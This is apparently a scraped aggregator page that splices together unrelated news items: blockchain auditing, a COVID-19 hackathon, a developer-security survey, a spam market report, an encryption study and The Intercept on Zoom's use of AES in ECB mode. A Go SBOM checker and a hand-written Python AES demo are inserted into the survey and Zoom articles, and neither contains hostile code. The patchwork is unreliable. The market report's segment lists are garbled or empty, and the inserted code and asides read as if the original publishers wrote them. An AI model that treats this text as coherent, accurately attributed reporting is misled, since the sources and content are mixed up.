Pathways to Growth: ‘Chain’ reaction – Accounting Today

Most of us first became aware of blockchain, the distributed, append-only ledger replicated across many nodes, as the technology behind bitcoin. Today blockchain is emerging with extraordinary implications for firm growth.

At the most recent AICPA Blockchain Symposium, I talked with three pioneers in the field. As a former auditor, I was especially interested in how blockchain is disrupting the traditional audit function. These explorers have embraced this brave new technology, even as guidelines are still being formulated. I was curious, like many of you, about what it's like to audit the blockchain.

I interviewed André Sterley, digital asset group leader for Mazars USA in New York; Andries Verschelden, the partner who leads the blockchain practice at Armanino in San Francisco; and Jagruti Solanki, an assurance partner at Aprio in Atlanta specializing in technology and blockchain.

These pioneers have a couple of things in common. They were all born outside the U.S. and all had a strong internal motivation to master blockchain technology. An "Aha!" moment for me was finding out that the blockchain is a subledger. I could get my head wrapped around auditing a subledger. Yet it's very different in that it represents a single set of books, housed in the cloud, which serves as a historical repository for every cryptocurrency-based transaction.

A personal journey

South Africa native André Sterley, who had always wanted to live and work in the U.S., moved from Mazars South Africa to join Mazars USA in their New York City office in 2014. During the move, parts of his life were on both continents, and André found that conventional means of making cross-border payments were slow, costly and inefficient. He started studying bitcoin, thinking it might be an alternative to methods like MoneyGram and Western Union.

André's intellectual curiosity grew beyond his own needs. After an in-depth exploration he conducted experiments with a few transactions. It took seconds, versus days for more traditional methods, and it was quite inexpensive. André saw the potential immediately and concluded that crypto assets and blockchain technology presented an enormous potential business opportunity. Since then, he has become something of a LinkedIn blockchain personality, providing entertaining content and commentary.

By early 2018, he was able to offer services to his first Mazars USA client, a business in need of an external financial statement audit. André described the need to develop cryptography skills: "Auditors were never taught cryptography, the functional discipline combining computer science and locking things digitally. This includes techniques derived from algorithms to secure information in ways that are hard to decipher. But now I had to rely on cryptography and had to get educated, to know that what I was evaluating could be relied upon."

Also, since blockchain is a shared ledger, a transaction's historical record is visible to every party with permission to access the blockchain. Imagine grain bushels on a boat, coming in and out of various locations, with the entire record chained together. The chain becomes the central source of truth for what was recorded, reducing the need for traditional confirmations and reconciliations. It does not, however, prove that the grain was actually on the boat: the auditor still has to tie on-chain entries to the real-world events they claim to represent.

Instead, typical questions to be answered are: Was this particular transaction authorized? Did it go to the right address? Were the parties to the transaction related?

Leveraging a passion

Andries Verschelden's career choice was not a surprise. His father Frans was managing partner of the Moore Stephens (now Moore) firm in Brussels, Belgium. In 2017 Andries merged the interim CFO business he was leading with Armanino, a leading Moore member based in California. Andries was drawn to the firm for its relentless focus on innovation. He went on to lead the firm's entire outsourcing business.

Increasingly fascinated by blockchain and the growing use of cryptocurrencies, Andries expressed his interest to managing partner Matt Armanino, who was impressed by his passion and enthusiasm. Armanino had been helping clients with blockchain services since 2014; in 2019 the firm upped its strategic investment in blockchain and made the equally strategic decision to put Andries in charge of the practice. He entered the arrangement with the understanding that blockchain would not be just another industry offering, but one that could fundamentally change the profession, the business model and client expectations.

How revolutionary would that change be? Extremely! Andries described to me the intriguing fact that the majority of digital assets today have no underlying real-world asset associated with them. They are series of ones and zeros that live only in the blockchain world, yet they can transfer value around the world instantaneously in a direct (peer-to-peer), secure way. He said, "Basically, you're being asked to do audits on something that is purely digital in nature, but is known to have value." Ponder that for a moment!

Also of note is the fact that existing enterprise resource planning systems are not set up to integrate with blockchain transactions. In a client situation, this creates a mixed bag of digital assets (like bitcoin) and non-digital assets (like greenbacks) living in different systems. The challenge is reconciling the two with existing tools such as Excel. Luckily, a number of new software startups are closing this gap. Examples are Lukka, Ledgible, Softledger and Blox.

Early adopter

Born in India and raised in Oman, Jagruti Solanki is an audit partner at Aprio in Atlanta. All things considered, she's an old hand at blockchain, having served her first client in 2013 when Bitcoin was selling for $200. She recalls with a smile her response ("You're crazy!") when her husband suggested investing. "Then it hit $20,000 and I thought I was the crazy one," she added.

Always up for a challenge, this tech-minded auditor made clear her interest in getting involved. Like André and Andries, she jumped in with both hands and feet, learning as she went about the risks and the upside potential.

Traditionally, blockchains have been operated publicly. And while private blockchain applications are growing, including among large retailers like Walmart, Jagruti noted the reluctance, even fear, on the part of some accounting firms to get involved.

That's because they see auditing companies that use blockchain technology as carrying a high risk. One contributing factor is that there is currently an absence of definitive standards for auditing the blockchain.

As a result, said Jagruti, there's a considerable amount of judgment involved. Firms that wish to get involved in blockchain should have a culture that is welcoming to technology and has significant trust in its leaders. What's more, she said, there is not yet a checklist for auditors in this space.

The path forward

Andries noted, "I wish there were a clearer roadmap, but we aren't there yet." As a result, those CPAs working with blockchain have formed a sharing community, learning from each other and making the journey together. The AICPA has been instrumental in facilitating this evolution.

I asked the three experts how they would proceed vis-à-vis blockchain if they were managing partners at their respective firms. Aprio's Solanki recommended moving boldly forward without fear, and bringing your clients along with you. She believes the spoils will go to the proactive, not to those who rest on the sidelines waiting and watching.

All three explorers concurred that training to get firm members comfortable with the technology is a high priority. Mazars' Sterley suggested building blockchain into your strategic planning for the future. Start thinking about what you will offer and how you will get up to speed. Survey clients to gauge their level of understanding and interest.

Armanino's Verschelden weighed in, calling blockchain a "trustless, utopian world" that disrupts perceptions of traditional trust and value in the CPA domain, like the production of quarterly or annual financial statements.

Armanino recently released Trustexplorer, which it describes as the world's first real-time audit capability. It is a tool that uses blockchain technology to continuously collect audit evidence, letting users generate, on demand, an audit report over balances that are never older than 30 seconds. The technology reminds me of streaming on demand versus how we accessed audio/video in years past.

Our explorers agreed that it's essential to ask the tough questions, e.g., will your culture support adoption of blockchain? How forward-looking is your firm? Are members locked into compliance mode, or are they ready to break out and innovate?

As you consider adopting blockchain as a strategic technology, note that it's viewed as a plus by young accounting professionals and could even become a recruitment tool. Offering it may also win you points from tech-forward clients, and those whose trust in established financial institutions and structures has eroded over the years.

Said Verschelden, "We are providing trust today. But our trust-providing function will change dramatically and the value that we are bringing can't be the way it's always been, through quarterly reports."

Much remains to be known about the role and impact of blockchain in the future. But there is no doubt that it will continue to migrate from the perimeter into the mainstream of our profession. And our pioneers will continue to chart the course in delivering on-the-ground, real-life experiences.

See original here:
Pathways to Growth: 'Chain' reaction - Accounting Today

ConsenSys Health launches Stop COVID-19 Ethereum Blockchain Hackathon – Ledger Insights

Today ConsenSys Health announced the Stop COVID-19 Virtual Hackathon, to start April 13 and run through May 11. Sponsors of the initiative include Gitcoin, Hyperledger, ConsenSys, One Million Developers and OpenMinded. The first virtual panels by mentors will be available today.

The project brings together three open source communities from Ethereum, Hyperledger and OpenMinded.

"Working together for the first time with a very specific toolset, this interdisciplinary group will rapidly create highly-relevant solutions with the potential to have both immediate- and long-term positive impact," said Heather Leigh Flannery, Founder and CEO of ConsenSys Health. "The core of our effort is to leverage converging innovations like blockchain, tokenization, zero-knowledge cryptography, and federated machine learning to advance immediate and long-term public health goals while preserving individual privacy."

Healthcare and life sciences volunteers will mentor developers. The group aims to address many of the issues highlighted in the news. The areas include clinical trials for vaccines, galvanizing supply chains for ventilators, location tracking without compromising privacy and other topics.

The award for first place is $10,000, with second and third place receiving $7,000 and $3,000, respectively.

The panel of judges so far includes ConsenSys founder and CEO Joseph Lubin, Brian Behlendorf, Executive Director of Hyperledger and four executives from ConsenSys Health. ConsenSys Health recently spun out of ConsenSys.

A week ago a few members of Hyperledger including HACERA, IBM and Oracle agreed to collaborate to collate Coronavirus data. And to the surprise of some, U.S. Homeland Security listed blockchain as a critical service in the context of COVID-19.

Read more:
ConsenSys Health launches Stop COVID-19 Ethereum Blockchain Hackathon - Ledger Insights

This is the Secret to Getting Clean, Secure Code from Your Developers – Computer Business Review



The secret ingredient to more secure code is out and it's simple: happiness.

That's according to a sweeping annual survey of over 5,000 developers, which found that they are three times as likely to spot security issues if happy at work.

The finding might seem faintly ludicrous: most businesses nowadays aspire, superficially or otherwise, to creating a positive working environment and those that fail should hardly expect insecure code as the inevitable outcome.

(It is extremely likely, of course, that happiness is an outcome of other factors that are in themselves greater contributors to more considered code reviews/QA: adequately staffed teams, less pressure to ship code at an unreasonable pace.)

But with developers shipping code ever faster under pressure from business leaders to iterate and innovate at pace, and the same survey showing that 28 percent of mature organisations have suffered a breach tied to open source components in the past 12 months, business leaders may want to ask themselves how they can make their developers happier.

Open source software security specialist Sonatype's seventh annual DevSecOps community survey, which reached developers in the UK, USA, India, Canada and the EU, is not, however, only about making a bed of roses for developers.

With software supply chain security firmly in the spotlight, following a string of security incidents, many businesses are looking closely at how to shore up the integrity of the code amid increasingly rapid development cycles. (The report found that 55 percent are deploying code to production at least weekly, up from 47 percent in 2019).

The security of application code, and of the open source components beneath it and baked into it, is vital: hundreds of thousands of open source packages sit in production applications throughout the supply chain, many of them rife with issues ranging from outdated versions to understaffed projects to known security flaws.

Sonatype found that happy developers, those that feel secure in their job, have access to training and are being given the right tools, are 65 percent more likely to conduct rigorous code checks. Dennis Orner, Software Engineer at TWT Digital Health, commented in the survey that: "Security falls short when things get shipped under pressure. This is not the case as often when security is part of the process."

When asked what caused the most friction in an organisation, members of mature DevOps teams reported no friction, while others cited immature practices and management as key causes of disruption.

Derek Weeks, Vice President at Sonatype, commented that: "Developer happiness based on mature DevOps practices is fundamental to the quality and delivery of secure software. By introducing mature DevOps practices, businesses can not only innovate faster, they can enhance their development teams' job satisfaction, and ultimately differentiate themselves as employers, critical when so many companies face significant skills shortages and increased competition."

Nearly one in four (24 percent) of those queried reported that they have suspected or verified a breach within the last 12 months.

Breaches caused by the integration of open source components have dropped slightly to 21 percent, following a sharp rise two years ago around the time of the Equifax breach, which the company blamed on an open source framework.

Established DevOps security teams are 69 percent more likely to follow an open source governance policy. These governance policies serve as a guiding framework for security teams and lay out, step by step, how an organisation approaches and handles the array of open source components it needs to operate. A key move for teams following a good governance policy is the implementation of software composition analysis (SCA) tools, which inventory the open source components in a build and match them against known vulnerability data.

However, only 45 percent of those operating mature DevOps practices say they keep a full software bill of materials for the open source components used in their applications.
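A bill of materials is only useful if something consumes it. The following Go program is an added example, not code from Sonatype or from the survey, of the basic check an SCA tool performs over an SBOM: it parses a minimal CycloneDX-style JSON document and flags every component whose version falls inside an advisory's vulnerable range. The SBOM, the acme-* package names and the ADV-* advisory identifiers are constructed for the example and correspond to no real packages or advisories; the version comparison is a deliberately simple numeric dotted-version compare, not a full semver implementation.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strconv"
	"strings"
)

// The slice of CycloneDX JSON this check reads; other BOM fields are ignored.
type sbom struct {
	Components []component `json:"components"`
}
type component struct {
	Name    string `json:"name"`
	Version string `json:"version"`
	Purl    string `json:"purl"` // package URL, e.g. pkg:npm/acme-parser@2.4.1
}

// advisory is a constructed stand-in for a vulnerability-feed entry: a package (purl without version) and its affected range [Introduced, Fixed).
type advisory struct{ ID, Purl, Introduced, Fixed string }
type finding struct{ Component, Version, AdvisoryID, Fixed string }

// parseVersion turns "v1.2.3-rc1" into [1 2 3]: a leading "v" and any pre-release or build suffix are dropped; unparsable parts count as zero.
func parseVersion(v string) []int {
	v = strings.TrimPrefix(v, "v")
	if i := strings.IndexAny(v, "-+"); i >= 0 {
		v = v[:i]
	}
	var out []int
	for _, p := range strings.Split(v, ".") {
		n, _ := strconv.Atoi(p)
		out = append(out, n)
	}
	return out
}

// compareVersions compares numerically part by part (so "1.10" > "1.9", unlike a string compare), treating missing trailing parts as zero.
func compareVersions(a, b string) int {
	pa, pb := parseVersion(a), parseVersion(b)
	for i := 0; i < len(pa) || i < len(pb); i++ {
		x, y := 0, 0
		if i < len(pa) {
			x = pa[i]
		}
		if i < len(pb) {
			y = pb[i]
		}
		if x < y {
			return -1
		} else if x > y {
			return 1
		}
	}
	return 0
}

// checkSBOM parses a CycloneDX JSON document and returns every component
// whose version lies inside an advisory's [Introduced, Fixed) range.
func checkSBOM(doc []byte, advisories []advisory) ([]finding, error) {
	var bom sbom
	if err := json.Unmarshal(doc, &bom); err != nil {
		return nil, err
	}
	var findings []finding
	for _, c := range bom.Components {
		key := c.Purl // strip "@version" so the purl matches the advisory key
		if i := strings.LastIndex(key, "@"); i >= 0 {
			key = key[:i]
		}
		for _, adv := range advisories {
			if key == adv.Purl && compareVersions(c.Version, adv.Introduced) >= 0 &&
				compareVersions(c.Version, adv.Fixed) < 0 {
				findings = append(findings, finding{c.Name, c.Version, adv.ID, adv.Fixed})
			}
		}
	}
	return findings, nil
}

// Constructed sample BOM and advisories; the package names and ADV-* IDs
// are fictional and exist only to exercise the check.
const sampleSBOM = `{"bomFormat": "CycloneDX", "specVersion": "1.4", "components": [
 {"name": "acme-parser", "version": "2.4.1", "purl": "pkg:npm/acme-parser@2.4.1"},
 {"name": "acme-logger", "version": "0.9.0", "purl": "pkg:maven/com.acme/acme-logger@0.9.0"}]}`

var sampleAdvisories = []advisory{
	{ID: "ADV-0001", Purl: "pkg:npm/acme-parser", Introduced: "2.0.0", Fixed: "2.4.2"},
	{ID: "ADV-0002", Purl: "pkg:maven/com.acme/acme-logger", Introduced: "0.1.0", Fixed: "0.9.0"},
}

func main() {
	findings, err := checkSBOM([]byte(sampleSBOM), sampleAdvisories)
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("%s %s: %s (fixed in %s)\n", f.Component, f.Version, f.AdvisoryID, f.Fixed)
	}
}
```

The half-open [introduced, fixed) convention matches how most advisory databases express affected versions, and the acme-logger entry sits exactly on its fixed boundary to show that it is correctly excluded while acme-parser 2.4.1 is flagged. Real tooling would also handle ecosystem-specific version schemes and walk the transitive components a CycloneDX BOM lists under its dependencies section.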

Mitesh Shanbhag, Assistant Vice President, Nomura International PLC, UK commented that: The time between a vulnerability announcement and its exploits appearing in the wild is just three days, so being proactive is now a must.

Continued here:
This is the Secret to Getting Clean, Secure Code from Your Developers - Computer Business Review

Open Source Software Market Summary, Trends, Sizing Analysis and Forecast To 20 – News by aeresearch

Latest report on the Open Source Software market: size, industry segment by application (BMForum, phpBB and PHPWind), by type (Shareware, Bundled Software, BSD (Berkeley Source Distribution) and Advanced Driver Assistance Systems (ADAS)), regional outlook, market demand, latest trends, industry growth and revenue by manufacturer, company profiles, shares and forecasts to 2026. Analyzes the current market and the coming years' growth of this industry.

The Open Source Software Market report provides a detailed overview of the industry including both qualitative and quantitative information. Open Source Software market with detailed market segmentation by return type, end-user and geography. The global Open Source Software market is expected to witness high growth during the forecast period. The report provides key statistics on the market status of the leading Open Source Software market players and offers key trends and opportunities in the market. The global Open Source Software market is segmented on the basis of return type and end-user.

The report also includes the profiles of key companies along with their SWOT analysis and market strategies. In addition, the report focuses on leading industry players with information such as company profiles, components and services offered, financial information, key development in past five years.

Request Sample Copy of this Report @ https://www.aeresearch.net/request-sample/145737

Global Open Source Software Market Segment by Manufacturers, this report covers:

Global Open Source Software Market Segment by Applications, can be divided into

Global Open Source Software Market Segment by Type, covers:

The Open Source Software market report provides a detailed analysis of global market size, regional and country-level market size, segmentation market growth, market share, competitive Landscape, sales analysis, impact of domestic and global market players, value chain optimization, trade regulations, recent developments, opportunities analysis, strategic market growth analysis, product launches, area marketplace expanding, and technological innovations.

Reason to Buy:

Save and reduce time carrying out entry-level research by identifying the growth, size, leading players and segments in the global Open Source Software market.
Highlights key business priorities in order to assist companies to realign their business strategies.
The key findings and recommendations highlight crucial progressive industry trends in the Open Source Software market, thereby allowing players to develop effective long-term strategies.
Develop/modify business expansion plans by using the substantial growth on offer in developed and emerging markets.
Scrutinize in-depth global market trends and outlook coupled with the factors driving the market, as well as those hindering it.
Enhance the decision-making process by understanding the strategies that underpin commercial interest with respect to products, segmentation and industry verticals.
The report analyzes factors affecting the Open Source Software market from both the demand and supply side and further evaluates the market dynamics affecting the market during the forecast period, i.e., drivers, restraints, opportunities and future trends. The report also provides an exhaustive PEST analysis for all five regions, namely North America, Europe, APAC, MEA and South & Central America, after evaluating the political, economic, social and technological factors affecting the Open Source Software market in these regions.

Table of Contents:

Introduction
Key Takeaways
Research Methodology
Open Source Software Market Landscape
Open Source Software Market Key Market Dynamics
Open Source Software Market Global Market Analysis
Open Source Software Market Revenue and Forecasts to 2026: Product Type
Open Source Software Market Revenue and Forecasts to 2026: Application
Open Source Software Market Revenue and Forecasts to 2026: Geographical Analysis
Industry Landscape
Open Source Software Market, Key Company Profiles

Request Customization on This Report @ https://www.aeresearch.net/request-for-customization/145737

Read this article:
Open Source Software Market Summary, Trends, Sizing Analysis and Forecast To 20 - News by aeresearch

Customer Personal Information Is the Number One Data Protection Priority nCipher 2020 Global Encryption Trends Study – Yahoo Finance

Organizations racing to protect sensitive data as it proliferates across cloud, IoT devices and 5G networks

As organizations accelerate digital initiatives such as cloud and the internet of things (IoT), and data volumes and types continue to rise, IT professionals cite protection of customer personal information as their number one priority, according to the 2020 Global Encryption Trends Study from the Ponemon Institute.


The Ponemon Institute has collaborated with nCipher Security, an Entrust Datacard company and world leader in hardware security modules (HSMs), on this multinational survey of how and why organizations deploy encryption, now in its fifteenth year.

Threats, drivers and priorities

For the first time, protecting consumer personal information is the top driver for deploying encryption (54% of respondents), outranking compliance, which ranked fourth (47%). Traditionally compliance with regulations was the top driver for deploying encryption, but has dropped in priority since 2017, indicating that encryption is transitioning from a requirement to a proactive choice to safeguard critical information.

Employee mistakes continue to be the biggest threat to sensitive data (54%) and significantly outweigh concerns over attacks by hackers (29%), or malicious insiders (20%). In contrast, the least significant threats cited include government eavesdropping (11%) and lawful data requests (12%).

Data discovery the number one challenge

With the proliferation of data from digital initiatives, cloud use, mobility, IoT devices and the advent of 5G networks, data discovery continues to be the biggest challenge in planning and executing a data encryption strategy, with 67% of respondents citing this as their top concern. And that is likely to increase, with a pandemic-driven surge in employees working remotely, using data at home, creating extra copies on personal devices and cloud storage.

Blockchain, quantum and adoption of new encryption technologies

The study indicates that 48% of organizations have adopted encryption strategies across their enterprises, up from 45% in 2019. With encryption deployment steadily growing, how are organizations looking ahead? In the near term, 60% of organizations plan to use blockchain, with cryptocurrency/wallets, asset transactions, identity, supply chain and smart contracts cited as the top use cases.

Other much-hyped technologies are not on IT organizations near-term radar. Most IT professionals see the mainstream adoption of multi-party computation at least five years away, with mainstream adoption of homomorphic encryption more than six years away, and quantum resistant algorithms over eight years out.

Trust, integrity, control

The use of hardware security modules (HSMs) continues to grow, with 48% of respondents deploying HSMs to provide a hardened, tamper-resistant environment with higher levels of trust, integrity and control for both data and applications. Organizations in Germany, the United States and the Middle East are more likely to deploy HSMs, with Australia, Germany and the United States most likely to assign importance to HSMs as part of their organization's encryption or key management activities.

HSM usage is no longer limited to traditional use cases such as public key infrastructure (PKI), databases, and application and network encryption (TLS/SSL). The demand for trusted encryption for new digital initiatives has driven significant HSM growth for big data encryption (up 17%), code signing (up 12%), IoT root of trust (up 10%) and document signing (up 7%). Additionally, 35% of respondents report using HSMs to secure access to public cloud applications.

The race to the cloud

Eighty-three percent of respondents report transferring sensitive data to the cloud, or planning to do so within the next 12 to 24 months, with organizations in the United States, Brazil, Germany, India and South Korea doing so most frequently.

In the next 12 months, respondents predict a significant increase in the ownership and operation of HSMs to generate and manage Bring Your Own Key (BYOK), and integration with a Cloud Access Security Broker (CASB) to manage keys and cryptographic operations. The survey found that the most important cloud encryption features are:


"Consumers expect brands to keep their data safe from breaches and have their best interests at heart. The survey found that IT leaders are taking this seriously, with protection of consumer data cited as the top driver of encryption growth for the first time," says Dr Larry Ponemon, chairman and founder of Ponemon Institute. "Encryption use is at an all-time high with 48% of respondents this year saying their organization has an overall encryption plan applied consistently across the entire enterprise, and a further 39% having a limited plan or strategy applied to certain application and data types."

"As the world goes digital, the impact of the global pandemic highlights how security and identity have become critical for organizations and individuals both at work and at home," says John Grimm vice president of strategy at nCipher Security. "Organizations are under relentless pressure to deliver high security and seamless access protecting their customer data, business critical information and applications while ensuring business continuity. nCipher empowers customers by providing a high assurance security foundation that ensures the integrity and trustworthiness of their data, applications and intellectual property."

Other key trends include:

Download the 2020 Global Encryption Trends Study here.

2020 Global Encryption Trends Study methodology

The 2020 Global Encryption Trends Study, based on research by the Ponemon Institute, captures how organizations around the world are dealing with compliance, increased threats, and the implementation of encryption to protect their business critical information and applications. 6,457 IT professionals were surveyed across multiple industry sectors in 17 countries/regions: Australia, Brazil, France, Germany, India, Japan, Hong Kong, Mexico, the Middle East (which is a combination of respondents located in Saudi Arabia and the United Arab Emirates), the Russian Federation, Southeast Asia (Indonesia, Malaysia, Philippines, Thailand, and Vietnam), South Korea, Taiwan, the United Kingdom, the United States and two new regions for the first time, Netherlands and Sweden.

About nCipher Security

nCipher Security, an Entrust Datacard company, is a leader in the general-purpose hardware security module (HSM) market, empowering world-leading organizations by delivering trust, integrity and control to their business-critical information and applications. Today's fast-moving digital environment enhances customer satisfaction, gives competitive advantage and improves operational efficiency; it also multiplies the security risks. Our cryptographic solutions secure emerging technologies such as cloud, IoT, blockchain, and digital payments and help meet new compliance mandates. We do this using the same proven technology that global organizations depend on today to protect against threats to their sensitive data, network communications and enterprise infrastructure. We deliver trust for your business-critical applications, ensure the integrity of your data and put you in complete control today, tomorrow, always. http://www.ncipher.com

Follow us on LinkedIn, Twitter, Facebook and Instagram search nCipherSecurity.

View source version on businesswire.com: https://www.businesswire.com/news/home/20200407005297/en/

Contacts

nCipher Security Liz Harris liz.harris@ncipher.com +44 7973 973648

View post:
Customer Personal Information Is the Number One Data Protection Priority nCipher 2020 Global Encryption Trends Study - Yahoo Finance

Zoom’s Flawed Encryption Linked to China – The Intercept

Meetings on Zoom, the increasingly popular video conferencing service, are encrypted using a mode of operation with serious, well-known weaknesses, and sometimes using keys issued by servers in China, even when meeting participants are all in North America, according to researchers at the University of Toronto.

The researchers also found that Zoom protects video and audio content using a home-grown encryption scheme, that there is a vulnerability in Zoom's waiting room feature, and that Zoom appears to have at least 700 employees in China spread across three subsidiaries. They conclude, in a report for the university's Citizen Lab, widely followed in information security circles, that Zoom's service is "not suited for secrets" and that it may be legally obligated to disclose encryption keys to Chinese authorities and responsive to pressure from them.

Zoom could not be reached for comment.

Earlier this week, The Intercept reported that Zoom was misleading users in its claim to support end-to-end encryption, in which no one but participants can decrypt a conversation. Zoom's Chief Product Officer Oded Gal later wrote a blog post in which he apologized on behalf of the company "for the confusion we have caused by incorrectly suggesting that Zoom meetings were capable of using end-to-end encryption." The post went on to detail what encryption the company does use.

[Diagram: how Zoom meetings work. Source: Zoom]

Based on a reading of that blog post and Citizen Lab's research, here is how Zoom meetings appear to work:

When you start a Zoom meeting, the Zoom software running on your device fetches a key with which to encrypt audio and video. This key comes from Zoom's cloud infrastructure, which contains servers around the world. Specifically, it comes from a type of server known as a key management system, which generates encryption keys and distributes them to meeting participants. Each user gets the same, shared key as they join the meeting. It is transmitted from the key management system to the Zoom software on their devices under a separate layer of encryption, TLS, the same protocol that protects https websites.

Depending on how the meeting is set up, some servers in Zoom's cloud called connectors may also get a copy of this key. For example, if someone calls in on the phone, they're actually calling a Zoom Telephony Connector server, which gets sent a copy of the key.

Some of the key management systems, 5 out of 73 in a Citizen Lab scan, seem to be located in China, with the rest in the United States. Interestingly, the Chinese servers are at least sometimes used for Zoom chats that have no nexus in China. The two Citizen Lab researchers who authored the report, Bill Marczak and John Scott-Railton, live in the United States and Canada. During a test call between the two, the shared meeting encryption key was sent to one of the participants over TLS from a Zoom server apparently located in Beijing, according to the report.

The report points out that Zoom may be legally obligated to share encryption keys with Chinese authorities if the keys are generated on a key management server hosted in China. If the Chinese authorities or any other hypothetical attacker with access to a key wants to spy on a Zoom meeting, they also need to either monitor the internet access of a participant in the meeting, or monitor the network inside the Zoom cloud. Once they collect the encrypted meeting traffic, they can use the key to decrypt it and recover the video and audio.

Citizen Lab flagged as worrisome not only the system used to distribute Zoom encryption keys but also the keys themselves and the way they are used to encrypt data.

Zoom's keys conform to the widely used Advanced Encryption Standard, or AES. A security white paper from the company claims that Zoom meetings are protected using 256-bit AES keys, but the Citizen Lab researchers confirmed the keys in use are actually only 128-bit. Such keys are still considered secure today, but over the last decade many companies have been moving to 256-bit keys instead.

Furthermore, Zoom encrypts and decrypts with AES using an algorithm called Electronic Codebook, or ECB, mode, "which is well-understood to be a bad idea, because this mode of encryption preserves patterns in the input," according to the Citizen Lab researchers. ECB is generally regarded as the weakest of AES's standard modes of operation.

Here's why: ciphertext from a good cipher mode should be indistinguishable from completely random data, such as static on a radio, but ECB mode fails this test. It encrypts each 16-byte block independently with the same key, so identical plaintext blocks produce identical ciphertext blocks: if there's a pattern in the unencrypted data, the same pattern shows up in the encrypted data. This Wikipedia page has a useful illustration to visualize this:

[Image: patterns appearing in data encrypted with AES in ECB mode. Source: Wikipedia]
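
To make the ECB point concrete, here is an added example (the editor's, not code from Zoom, Citizen Lab or The Intercept). It carries a small pure-Python AES-128, encryption direction only so that it runs without third-party packages, and encrypts a plaintext containing a repeating 16-byte pattern, the way a flat region of a video frame repeats, once in ECB mode and once in CBC mode. Counting duplicate ciphertext blocks is the classic test for ECB. The key, IV and plaintext are constructed for the demo; the block cipher itself is checked against the FIPS-197 test vector.

```python
"""Added example (the editor's, not Zoom's or Citizen Lab's code): why ECB leaks patterns.
Contains a minimal pure-Python AES-128 (encrypt direction only) so it runs with no extra packages."""
import os


def _xtime(a):
    """Multiply by x in GF(2^8) modulo the AES polynomial x^8 + x^4 + x^3 + x + 1."""
    return ((a << 1) ^ 0x1b) & 0xff if a & 0x80 else a << 1


def _gen_sbox():
    """Derive the AES S-box (multiplicative inverse followed by the affine map)."""
    sbox = [0] * 256
    p = q = 1
    rotl = lambda x, s: ((x << s) | (x >> (8 - s))) & 0xff
    while True:
        p = (p ^ (p << 1) ^ (0x1b if p & 0x80 else 0)) & 0xff   # p *= 3 (3 generates GF(2^8)*)
        q = (q ^ (q << 1)) & 0xff                                # q /= 3, so q stays equal to 1/p
        q = (q ^ (q << 2)) & 0xff
        q = (q ^ (q << 4)) & 0xff
        if q & 0x80:
            q ^= 0x09
        sbox[p] = q ^ rotl(q, 1) ^ rotl(q, 2) ^ rotl(q, 3) ^ rotl(q, 4) ^ 0x63
        if p == 1:
            break
    sbox[0] = 0x63
    return sbox


SBOX = _gen_sbox()


def _expand_key(key):
    """AES-128 key schedule: 16-byte key -> 11 round keys of 16 bytes each."""
    w = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    rcon = 1
    for i in range(4, 44):
        t = list(w[i - 1])
        if i % 4 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]   # RotWord, then SubWord
            t[0] ^= rcon
            rcon = _xtime(rcon)
        w.append([a ^ b for a, b in zip(w[i - 4], t)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(11)]


def aes128_encrypt_block(key, block):
    """Encrypt one 16-byte block; the state is a flat list in AES column-major order."""
    rk = _expand_key(key)
    s = [b ^ k for b, k in zip(block, rk[0])]
    for rnd in range(1, 11):
        s = [SBOX[b] for b in s]                               # SubBytes
        s = [s[(i + 4 * (i % 4)) % 16] for i in range(16)]     # ShiftRows (row r rotates left by r)
        if rnd != 10:                                          # MixColumns, skipped in the last round
            out = []
            for c in range(0, 16, 4):
                a = s[c:c + 4]
                t = a[0] ^ a[1] ^ a[2] ^ a[3]
                out += [a[i] ^ t ^ _xtime(a[i] ^ a[(i + 1) % 4]) for i in range(4)]
            s = out
        s = [b ^ k for b, k in zip(s, rk[rnd])]                # AddRoundKey
    return bytes(s)


def pkcs7_pad(data):
    n = 16 - len(data) % 16
    return data + bytes([n]) * n


def encrypt_ecb(key, data):
    """ECB: each block encrypted on its own, so equal plaintext blocks give equal ciphertext blocks."""
    data = pkcs7_pad(data)
    return b"".join(aes128_encrypt_block(key, data[i:i + 16]) for i in range(0, len(data), 16))


def encrypt_cbc(key, iv, data):
    """CBC: each block is XORed with the previous ciphertext block before encryption, breaking repeats."""
    data = pkcs7_pad(data)
    out, prev = [], iv
    for i in range(0, len(data), 16):
        prev = aes128_encrypt_block(key, bytes(x ^ y for x, y in zip(data[i:i + 16], prev)))
        out.append(prev)
    return b"".join(out)


def repeated_blocks(ct):
    """Count of 16-byte ciphertext blocks that occur more than once: the classic ECB tell."""
    blocks = [ct[i:i + 16] for i in range(0, len(ct), 16)]
    return len(blocks) - len(set(blocks))


if __name__ == "__main__":
    key = bytes(range(16))                         # constructed demo key, not a real secret
    # Constructed plaintext with a repeating 16-byte pattern, like a flat region of a video frame.
    msg = b"FRAME-ROW-0x00FF" * 6 + b"something else here"
    ecb, cbc = encrypt_ecb(key, msg), encrypt_cbc(key, os.urandom(16), msg)
    print("ECB repeated blocks:", repeated_blocks(ecb))    # 5: the pattern survives encryption
    print("CBC repeated blocks:", repeated_blocks(cbc))    # 0
```

The six identical plaintext blocks come out of ECB as six identical ciphertext blocks, which is all an eavesdropper needs to see the shape of the data; the key length (128 or 256 bits) has nothing to do with it. Real deployments should use an authenticated mode such as AES-GCM from a maintained library rather than hand-written AES, and CBC with a reused IV would still leak whether two messages start the same way, which is why the demo draws a fresh IV.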

Once it has been encrypted in this manner, video and audio data is distributed to all participants in a meeting through a Zoom Multimedia Router server. For most users, this server runs in Zoom's cloud, but customers can choose to host this part on-premises. In that case, Zoom still generates, and thus has access to, the AES key that encrypts the meeting, but shouldn't have access to the meeting content itself, so long as none of the aforementioned connector servers (for phone calls and so forth) are participating in the meeting. (In its blog post, Zoom said self-hosting customers will eventually be able to manage their own encryption keys.)

Meeting hosts can set their meetings to have virtual "waiting rooms", making it so that users do not directly enter the meeting when they log on with Zoom but instead must wait to be invited in by a participant. The Citizen Lab researchers discovered a security vulnerability with this feature while conducting their encryption analysis. They said in their report that they have disclosed the vulnerability to Zoom but that "we are not currently providing public information about the issue to prevent it from being abused." In the meantime, the researchers advised Zoom users who desire confidentiality to avoid using waiting rooms and instead set passwords on meetings.

